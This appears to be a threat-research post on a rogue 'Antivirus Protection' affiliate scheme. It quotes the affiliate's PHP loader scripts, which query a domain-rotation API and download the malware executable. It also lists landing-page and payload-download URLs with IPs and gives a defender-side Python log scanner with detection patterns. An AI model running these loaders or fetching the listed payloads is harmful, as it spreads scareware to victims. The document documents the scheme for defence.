First contact on 24 Feb.
Recontacted on the 25th and the 6th, and more seriously about business on 7 Mar:
9 Mar, loader operational.
"Marketing company": no name, no logo; looks like a private affiliate.
• dns: » ip: 188.72.248.141 - address: NET-WINTOOLS.BIZ
Affiliate panel screenshots (images not included): Login, News, Statistics, Promo, Statistics by promo, Payment, Profile, FAQ.
load1.txt:
<?php
/*
 * Fetches the exe and writes it to a file
 *
 */
$fileName = "scanner.1";
$afid     = "you_afid"; // 1
// Ask the affiliate panel for the currently active (rotated) distribution domain
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$actual_domain   = file_get_contents($urlActualDomain);
if (!$actual_domain) my_error("Can't get domain.");
// Download the loader binary for this affiliate id from that domain
$exe_url  = "http://$actual_domain/ldpatch/softpatch.php?afid=" . $afid;
$baka_exe = file_get_contents($exe_url);
if (strlen($baka_exe) > 0) {
    $h = fopen($fileName, "w");
    fwrite($h, $baka_exe);
    fclose($h);
    echo "OK";
} else {
    my_error("Can't get exe.");
}
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
    echo("Update baka - Error:" . $error_str . "\r\n");
    exit;
}
?>
load2.txt:
<?php
/*
 * Load2
 * Writes the current domain to a file
 *
 */
$fileDomain = "domain.1";
// Same domain-rotation API call as load1; the response body is the active domain
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$actual_domain   = file($urlActualDomain);
if (sizeof($actual_domain) == 0) my_error("Can't get domain.");
$h    = fopen($fileDomain, "w");
$text = implode("", $actual_domain);
fwrite($h, "http://" . $text);
fclose($h);
echo "OK";
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
    echo("Update baka - Error:" . $error_str . "\r\n");
    exit;
}
////////////////////////////////////////////////////////////////////////////////
?>
load3.txt:
<?php
/*
 * Load3
 * Appends a path to the URL (e.g. /scanner15/?afid=3)
 */
$fileName = "my_file.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";
$h    = fopen($fileName, "w");
$text = file($urlActualDomain);
$text = implode("", $text);
// Writes the full landing URL on the active domain, with the affiliate id hard-coded to 3
fwrite($h, "http://" . $text . "/scanner15/?afid=3");
fclose($h);
echo "OK";
exit;
?>
This affiliate is currently spreading "Antivirus Protection" (ask if you want the sample).
Landing pages:
• dns: 1 » ip: 31.184.234.89 - address: SPACEIN-WEB1.UNI.ME
http://spacein-web1.uni.me/monitor10/?www=465
http://spacein-web1.uni.me/monitor11/?www=465
http://spacein-web1.uni.me/monitor15/?www=465
• dns: 1 » ip: 46.21.159.175 - address: VIDEO-NKLPC1.TK
http://video-nklpc1.tk/xxx2/?www=465
http://video-nklpc1.tk/xxx5/?www=465
• dns: 1 » ip: 95.211.128.136 - address: UBER-SCANPCXZ3.TK
• dns: 1 » ip: 95.211.128.136 - address: UBER-SCANPCXZ4.TK
http://uber-scanpcxz3.tk/monitor10/?www=465
http://uber-scanpcxz3.tk/monitor11/?www=465
http://uber-scanpcxz3.tk/monitor15/?www=465
Malware download:
• dns: 1 » ip: 83.149.112.46 - address: GOADVANCED-SOFTZ.IN
http://goadvanced-softz.in/sis/spch.php?www=465
http://goadvanced-softz.in/sis/in/out/465.exe
• dns: 1 » ip: 205.204.87.27 - address: WHITE-DOGGYSOFT.IN
http://white-doggysoft.in/sis/spch.php?www=465
http://white-doggysoft.in/sis/in/out/465.exe
http://white-doggysoft.in/soft/loader.exe
http://white-doggysoft.in/soft/installer_m.exe
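As an added, defender-side example (not code from the post or from the affiliate), the scanner below flags proxy log lines that match the loader's domain-rotation API call and the landing and download URL patterns listed above, and pulls out the afid/www id that ties hits to one affiliate. The log lines, the rotated-domain.example host and the REDACTED_KEY value are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Request patterns taken from the loader scripts and the URL lists in the post.
PATTERNS = [
    ("domain-rotation api", re.compile(r"^/promo/domain/\?.*\bapi_key=")),
    ("loader exe fetch",    re.compile(r"^/ldpatch/softpatch\.php\?afid=\d+")),
    ("rogue av landing",    re.compile(r"^/(monitor|xxx)\d+/\?www=\d+")),
    ("rogue av payload",    re.compile(r"^/sis/(spch\.php\?www=\d+|in/out/\d+\.exe)$")),
    ("installer download",  re.compile(r"^/soft/(loader|installer_m)\.exe$")),
]

# Constructed sample proxy log (ts client method url status); not real traffic.
# "rotated-domain.example" stands in for whatever the API returned; key redacted.
SAMPLE_LOG = """\
1331280001 10.0.0.5 GET http://net-wintools.biz/promo/domain/?category=1&api_key=REDACTED_KEY 200
1331280002 10.0.0.5 GET http://rotated-domain.example/ldpatch/softpatch.php?afid=1 200
1331280040 10.0.0.9 GET http://spacein-web1.uni.me/monitor15/?www=465 200
1331280041 10.0.0.9 GET http://goadvanced-softz.in/sis/in/out/465.exe 200
1331280042 10.0.0.9 GET http://white-doggysoft.in/soft/loader.exe 200
1331280050 10.0.0.7 GET http://www.example.org/index.html 200
"""

def classify(url):
    """Return the label of the first matching pattern for a URL, or None."""
    parts = urlsplit(url)
    target = parts.path + ("?" + parts.query if parts.query else "")
    for label, rx in PATTERNS:
        if rx.search(target):
            return label
    return None

def affiliate_id(url):
    """Pull the affiliate/campaign id (afid=, www=, or the NNN.exe name) that links hits."""
    qs = parse_qs(urlsplit(url).query)
    for key in ("afid", "www"):
        if key in qs:
            return qs[key][0]
    m = re.search(r"/in/out/(\d+)\.exe$", urlsplit(url).path)
    return m.group(1) if m else None

def scan_log(text):
    """Return (client, label, host, affiliate_id) for every matching log line."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        label = classify(fields[3]) if len(fields) >= 5 else None
        if label:
            hits.append((fields[1], label, urlsplit(fields[3]).hostname, affiliate_id(fields[3])))
    return hits
```

Run it over a real proxy export in the same five-column shape; the hard-coded hosts in the post rotate, so the path patterns are the part worth keeping.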
A weird string was also found on the promo server: Projects/BakaSoft/wdd2010.com/promo_new/trunk/htdocs
Maybe it's the same program, or maybe he paid the people at BakaSoft and they sold him the system.
Index Of/ (directory listing screenshot, not included)
Comments:
LOL at the 20mb file WTF how is that even possible.
it tries to look like a real av...